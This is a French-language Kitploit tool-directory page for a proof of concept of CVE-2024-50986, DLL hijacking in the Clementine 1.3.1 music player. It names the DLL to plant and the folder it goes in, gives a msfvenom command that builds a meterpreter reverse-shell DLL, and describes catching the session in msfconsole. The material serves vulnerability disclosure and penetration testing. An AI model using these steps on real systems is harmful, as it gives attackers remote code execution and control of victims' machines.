Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-50986 — Un problème dans Clementine v.1.3.1 permet à un attaquant local d'exécuter du code arbitraire via un fichier DLL spécialement conçu (DLL Hijacking) | Kitploit
Outils/GitHubGitHub/riftsandroses/cve-2024-50986
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodePost-ExploitationTests d'IntrusionExploitation de Binaires
GitHubriftsandroses/cve-2024-50986

CVE-2024-50986

Un problème dans Clementine v.1.3.1 permet à un attaquant local d'exécuter du code arbitraire via un fichier DLL spécialement conçu (DLL Hijacking)

Voir le dépôt
14il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-50986 : Exploit de détournement de DLL pour Clementine

Description : Un problème dans Clementine v.1.3.1 permet à un attaquant local d'exécuter du code arbitraire via un fichier DLL malveillant.

Version concernée : Clementine v.1.3.1

Chercheur : Utkarsh (r1971d3) LinkedIn

Lien NIST CVE : https://nvd.nist.gov/vuln/detail/CVE-2024-50986

Type de vulnérabilité : Chemin de recherche non fiable

Composant affecté : QUSEREX.DLL

Preuve de concept de l'exploit

Vecteur d'attaque

Pour exploiter cette vulnérabilité, un attaquant doit créer une DLL malveillante nommée QUSEREX.DLL et la placer dans le répertoire : C:\Users<username>\AppData\Local\Microsoft\WindowsApps. Lorsque l'application Clementine est lancée, elle charge la DLL malveillante, exécutant ainsi le code de l'attaquant.

Description et utilisation

  1. Utilisez Process Monitor (procmon) avec les filtres appropriés pour identifier les DLL manquantes et suivre où Clementine les recherche dans le système d'exploitation Windows

Capture_3

  1. La recherche révèle que la DLL "QUSEREX.DLL" est recherchée dans plusieurs emplacements, notamment C:\Users<username>\AppData\Local\Microsoft\WindowsApps\

Capture_4

  1. Une DLL malveillante est créée à l'aide de msfvenom avec la commande suivante :
root@kitploit:~
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL

Capture_5

  1. Cette DLL malveillante est placée dans le répertoire C:\Users<username>\AppData\Local\Microsoft\WindowsApps, où elle est chargée avec succès par Clementine.

Capture_6

  1. En utilisant msfconsole, une charge utile échelonnée est envoyée via le shell inverse, ce qui permet d'obtenir une session de shell meterpreter dans le répertoire C:\Program Files (x86)\Clementine\projectm-presets sur la machine cible.

Capture_7

Capture_8

Télécharger l’outil